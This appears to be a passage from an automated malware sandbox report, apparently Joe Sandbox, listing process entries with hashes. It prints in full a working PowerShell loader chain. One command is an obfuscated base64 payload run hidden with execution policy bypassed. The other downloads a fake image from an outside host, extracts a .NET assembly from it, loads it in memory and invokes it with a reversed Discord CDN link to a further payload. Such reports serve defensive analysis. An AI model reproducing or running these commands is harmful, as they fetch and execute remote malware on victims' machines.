redDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreYgBlDgTreGUDgTreMDgTreBlDgTreDMDgTreZQDgTre2DgTreGQDgTreMQBhDgTreDMDgTreNDgTreDgTrezDgTreDgDgTreMDgTreDgTre2DgTreDIDgTreYwBlDgTreGEDgTreMgDgTreyDgTreDcDgTreNDgTreBjDgTreDEDgTreMDgTreDgTre2DgTreGIDgTreNQBjDgTreDgDgTreYQBmDgTreDcDgTreYwBhDgTreDQDgTreYgDgTre5DgTreDgDgTreODgTreBhDgTreDkDgTreOQBjDgTreGIDgTreZQDgTre4DgTreGUDgTreMwBjDgTreDcDgTreMwDgTre4DgTreDIDgTreNQBkDgTreGIDgTreODgTreDgTre5DgTreDgDgTreNgDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreOQBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreMQBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZQBsDgTreGkDgTreZgDgTrevDgTreDUDgTreODgTreDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDYDgTreMgDgTrewDgTreDUDgTreNwDgTreyDgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                Imagebase:0x7ff741d30000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:12:32:42
                Start date:23/05/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:16
                Start time:12:32:43
                Start date:23/05/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
                Imagebase:0x7ff741d30000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >
                  Memory Dump Source
                  • Source File: 0000000E.00000002.1920612315.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_7ffaab790000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                  • Instruction ID: 664c95056e48d964d17e5b9ebbe6645d5f2c4efcdac3023fb9526672fc36d70d
                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                  • Instruction Fuzzy Hash: 7501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45